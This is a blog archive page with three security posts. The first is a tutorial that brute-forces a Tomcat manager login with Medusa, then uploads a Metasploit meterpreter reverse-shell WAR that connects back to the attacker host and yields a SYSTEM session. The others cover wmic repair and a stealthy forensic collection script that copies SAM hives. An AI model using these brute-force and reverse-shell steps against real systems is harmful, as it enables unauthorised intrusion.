TheInterW3bs.com

Just another guy griping on his blog

Archive for March, 2010

Using Medusa and Metasploit against Tomcat

Mar 31

Posted by nick in Hacking

In this post I thought I would do a simple demonstration of how to use Medusa to test for Tomcat accounts and then utilize Medusa’s findings to exploit Tomcat with Metasploit.  I am going to assume you have Medusa and Metasploit installed and you enumerated a Tomcat server by some method like nmap, nessus or you just knew an application uses Tomcat.  For my example, 192.168.1.30 is the Tomcat server and 192.168.1.2 is the attacker.  After you verified you found a Tomcat server, open a browser and visit the Tomcat Manager Application

http://192.168.1.30:8080/manager/html

It should prompt you for a user/pass.  Since we don’t know the user/pass this will be the page we run a dictionary attack against.  Hopefully you have some dictionary files but for this example I am just going to create a very simple one

# cat /tmp/usernames
test
admin
monkey
manager
commanderpoo

# cat /tmp/passwords
test
rockyou
password123
password12345
changeme

Then we tell Medusa to perform something similar to this

# ./medusa -M http -h 192.168.1.30 -U /tmp/usernames -P /tmp/passwords -e ns -n 8080 -m DIR:manager/html
(-M) http module
(-h) host IP or name
(-U) username dictionary file
(-P) password dictionary file
(-e ns) [n] No Password, [s] Password=Username
(-n) port number
(-m) directory path for URL

If Medusa finds an account it should print out a [SUCCESS] next to the account found

ACCOUNT CHECK: [http] Host: 192.168.1.30 (1 of 1, 0 complete) User: monkey (3 of 6, 2 complete) Password: changeme (8 of 8 complete)
ACCOUNT CHECK: [http] Host: 192.168.1.30 (1 of 1, 0 complete) User: manager (4 of 6, 3 complete) Password:  (1 of 8 complete)
ACCOUNT FOUND: [http] Host: 192.168.1.30 User: manager Password:  [SUCCESS]
ACCOUNT CHECK: [http] Host: 192.168.1.30 (1 of 1, 0 complete) User: root (5 of 6, 4 complete) Password:  (1 of 8 complete)
ACCOUNT CHECK: [http] Host: 192.168.1.30 (1 of 1, 0 complete) User: root (5 of 6, 4 complete) Password: root (2 of 8 complete)

Here Medusa found the account “manager” with no password set.  Now revisit the URL, entering the newly discovered user/pass and you should see something similar to

To take advantage of this new found power we are going to upload and deploy a malicious WAR file into Tomcat.  To create the WAR file use Metasploit’s msfpayload and pick your desired payload

# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4545 W > /tmp/MetRev.war

Once the WAR file payload is created you need to upload it to Tomcat via the Manager Application.  So under the section “WAR file to upload” select your msfpayload.

Start up msfconsole and configure it to handle your payload

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf exploit(handler) > set lport 4545
lport => 4545
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler

Once Metasploit is ready and waiting for a connection, you need to get Tomcat to run your WAR.  There might be an easier way but I found that if you look in the WAR file and determine the jsp file name you can just call that jsp file in the browser.  So figure out the random jsp file name

# unzip -l /tmp/MetRev.war
Archive:  /tmp/MetRev.war
Length      Date    Time    Name
---------  ---------- -----   ----
71  03-31-2010 23:01   META-INF/MANIFEST.MF
0  03-31-2010 23:01   WEB-INF/
276  03-31-2010 23:01   WEB-INF/web.xml
1157  03-31-2010 23:01   xnjpnric.jsp
75776  03-31-2010 23:01   rQUihgjlKyT.txt
---------                     -------
77280                     5 files

Then in your browser visit the jsp page and MSF should get a connection back.  From there you can do what you want (always fun to migrate over to Explorer.exe’s pid and take a screenshot)

http://192.168.1.30:8080/MetRev/xnjpnric.jsp
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.2:4545 -> 192.168.1.30:4230)
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > migrate 618
meterpreter > screenshot
4 Comments

wmic not working

Mar 5

Posted by nick in Windows

I ran across a machine today that wasn’t letting me run wmic commands on it. I was getting a few different errors

Description = The RPC server is unavailable.
Facility = Win32
Parsing Mof File: C:\WINDOWS\System32\wbem\Cli.mof(Phase Error - 3)

After a good deal of fiddling I got it to work by doing the following

Stop winmgmt and it’s needed dependencies
goto \\remotemachine\c$\windows\system32\wbem
rename the Repository directory to something else
start winmgmt on the remotemachine
open cmd window via psexec on the remote machine and add a hkcu key

sc \\remotemachine stop winmgmt and it's needed deps
rename remotemachine's c:\windows\system32\wbem\repository
sc \\remotemachine start winmgmt
psexec \\remotemachine cmd.exe
reg add "hkcu\Environment" /v PROCESSOR_ARCHITECTURE /t REG_SZ /d x86

Then while still in the remote cmd window try wmic and it should work

wmic process list brief
No Comments

Kludge – a simple analysis script

Mar 1

Posted by nick in Forensics, Windows

Kludge – Kludge-2.9.zip

Whenever I needed to investigate a machine for whatever the reason is, whether an AV alert, IDS sensor alert, user call-in or whatever, I like to use some standard and simple repeatable steps. A while back, I put together a horribly coded batch script that is basically a wrapper to run a collection of different commands and tools that perform a handful of simple analysis steps. The script writes out the results into an awkward html report and after that it’s up to you to analyze the results. Of course these checks aren’t fool-proof investigative steps and there are a million ways to thwart detection but these checks are a decent start.

The script is broken down into a bat file and a vbs file and depending on what level of analysis you want you can choose how verbose you want the output. I could probably make a better script and perhaps just one script using nothing but vbscript but vbscript isn’t my cup of tea. I tried to make the script as non-intrusive to the user as possible so the user probably won’t notice.

Script Features
Can be run remotely without user interaction/knowledge

Gathers System Information – environment variables, OS info, path, drive info, partition info, user accounts, scheduled tasks, logged on users, shares, USB Device History, Installed Hotfixes and Service Packs

Network info – TCP/UDP Connections, Cached DNS, IP and route info, firewall info, hosts file contents, NetBios Connections, NetBios over TCP Connections, Cache and Resolution, NetBios Session Information

Process Information – lists all running processes, list all processes using wsock32.dll, Startup Apps, Services, Dlls, Open Handles

File Information – dumps IE and FF browser history, outputs contents of Program Files, Documents and Settings and Windows directories, searches for ADS files, md5 hashes of Windows and Docs&Settings directories, outputs event logs, outputs Flash version, Acrobat versions, Java Versions and lists version used by browser, Firefox version, outputs each user’s recyclebin contents, copies all user’s Flash Cookies, outputs any unsigned executables in the sys32 directory

Registry Information – outputs installed BHO’s, outputs a bunch of common reg keys, dumps HKLM, HKCU, HKCR, HKU, HKCC, copies Sam, Sam.log, Sam.sav, Security, Security.log, Security.sav, Software, Software.log, Software.sav, System, System.alt, System.log, System.sav, Default, Default.log, Default.sav, Userdiff, Userdiff.log, Ntuser.dat.log and each user’s NTUSER.DAT.  Outputs RegRipper plugins against each hive file, outputs RegSlack against each hive, outputs Regscan

AV – currently dumps McAfee logs and Symantec logs (XP and Vista), outputs quarantine folder contents, runs rootkit scans

Memory Analysis – dumps memory, dumps individual process memory, Virtual and Physical memory process analysis

Running the Script
There are a two different ways to run the script:  The bat file is for running locally.  The vbs file is for running remotely.  No matter what version you run when the script is done it cleans itself up and zips up the report.  Output detail levels are the same for both running remotely or locally.
The levels are the following
- 1 - short analysis
- 2 – detailed analysis
- 3 – detailed analysis includes all checks, md5 hashes, ads files output and full memory dumping along with individual process dumps.

Locally running the script
For locally running the script, use kludge.bat or use cscript to call the kludge.vbs file via the cmdline.
To run locally, unzip kludge.zip and place all the needed tools into a directory with kludge.bat/vbs.  Then to run the kludge.bat with a detail level of ’2′ do -
# kludge.bat 2

Remotely running the script
For running remotely use the kludge.vbs. The kludge.vbs will suppress the output on the user’s end, so the user will be unaware.
When you run the script you can use the following syntax.  Where ’2′ is the detail level.

kludge.vbs 2

To run remotely
# As Admin goto \\RemoteMachine\c$
# Copy the kludge folder containing all the tools and the 2 scripts to the remote machine’s (for example to c:\)
# Then as an Admin open a Command Prompt on your machine
# Change directories to wherever you keep psexec.exe and run the following picking 1, 2 or 3 for your output detail level

 psexec.exe \\RemoteMachine -u domain\AdminUserName -w c:\kludge cmd.exe /c c:\kludge\kludge.vbs 2

# Then copy the report to your machine

I also added a couple extra arguments in case you wanted to keep track of what machines you ran the script against and determine if you have run the script before against the same machine. To do this you could setup a share somewhere on the network and create a csv file on the share. Then execute the script like the following

 psexec.exe \\RemoteMachine -u domain\AdminUserName -w c:\kludge cmd.exe /c c:\kludge\kludge.vbs 3 123456 nick

Where ’3′ is the detail level, “12345″ could be a possible ticket number and “nick” is the analyst’s name. This info could be written to the remote share’s csv file and you could have the script search the csv file for any previous occurrences involving this machine and report on them.
I did not add the needed code for the csv write/read to the kludge.bat file since not everyone will use this, so to take advantage of this edit the bat file and add something like this near the top of the bat file.

echo ^Analysis Ran last on^ >> Report-%COMPUTERNAME%.html
echo ^ >> Report-%COMPUTERNAME%.html
grep %computername% \\192.168.1.1\Reports\reports.csv >> Report-%COMPUTERNAME%.html
echo %computername%,%date%,%2,%3 >> Report-%COMPUTERNAME%.html
echo %computername%,%date%,%2,%3 >> \\192.168.1.1\Reports\reports.csv

echo ^ >> Report-%COMPUTERNAME%.html

Getting the tools -
In order to run the script you will need to download some tools and since I can’t distribute them here are the links to them.
KludgeKludge-2.9.zip
Listdlls.exehttp://technet.microsoft.com/en-us/sysinternals/bb896656.aspx
handle.exehttp://technet.microsoft.com/en-us/sysinternals/bb896655.aspx
Psinfo.exehttp://technet.microsoft.com/en-us/sysinternals/bb897550.aspx
psloggedon.exehttp://technet.microsoft.com/en-us/sysinternals/bb897545.aspx
streams.exehttp://technet.microsoft.com/en-us/sysinternals/bb897440.aspx
tcpvcon.exehttp://technet.microsoft.com/en-us/sysinternals/bb897437.aspx
vmmap.exehttp://technet.microsoft.com/en-us/sysinternals/dd535533.aspx
autorunsc.exehttp://technet.microsoft.com/en-us/sysinternals/bb963902.aspx
SigCheck.exehttp://technet.microsoft.com/en-us/sysinternals/bb897441.aspx
procdump.exehttp://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

7za.exe – 7-Zip Command Line Version – http://www.7-zip.org/download.html
grep.exe, uniq.exe, cut.exehttp://sourceforge.net/projects/unxutils/
md5deep.exehttp://md5deep.sourceforge.net/
mdd.exe – physical memory acquisition tool – http://sourceforge.net/projects/mdd/files/
mbr.exe – GMER mbr rootkit scanner – http://www2.gmer.net/mbr/
sarcli.dll, sar1.dll, sar2.dll, sar3.dll, sar4.dll, sar5.dll, sar6.dll, MEMSWEEP.sys, helper.exe – Sophos sarcli.exe – http://www.sophos.com/products/free-tools/sophos-anti-rootkit.html
catchme.exe – rootkit/stealth malware scanner – http://www2.gmer.net/catchme.htm
rifiuti.exe, cygwin1.dllhttp://www.foundstone.com/us/resources/proddesc/rifiuti.htm
rip.exe, regscan.exe, regslack.exe, p2x588.dll and the plugins directory from regripperhttp://www.regripper.net/
HoboCopy.exehttp://sourceforge.net/projects/wangdera/files/HoboCopy/

I was asked to use some Windows binaries from a trusted source in case the machine I am analyzing has tainted exe’s so I set the script to call the following from the same folder as the script. You will need to copy the following exe’s into the same folder or simply edit the script removing the .\ from the command.

Arp.exe – native Windows command. Copy the binary from trusted box
At.exe – native Windows command. Copy the binary from trusted box
ipconfig.exe – native Windows command. Copy the binary from trusted box
nbtstat.exe – native Windows command. Copy the binary from trusted box
net.exe – native Windows command. Copy the binary from trusted box
netsh.exe – native Windows command. Copy the binary from trusted box
netstat.exe – native Windows command. Copy the binary from trusted box
route.exe – native Windows command. Copy the binary from trusted box
schtasks.exe – native Windows command. Copy the binary from trusted box

Please let me know if you have any suggestions, issues, modifications and/or comments.

No Comments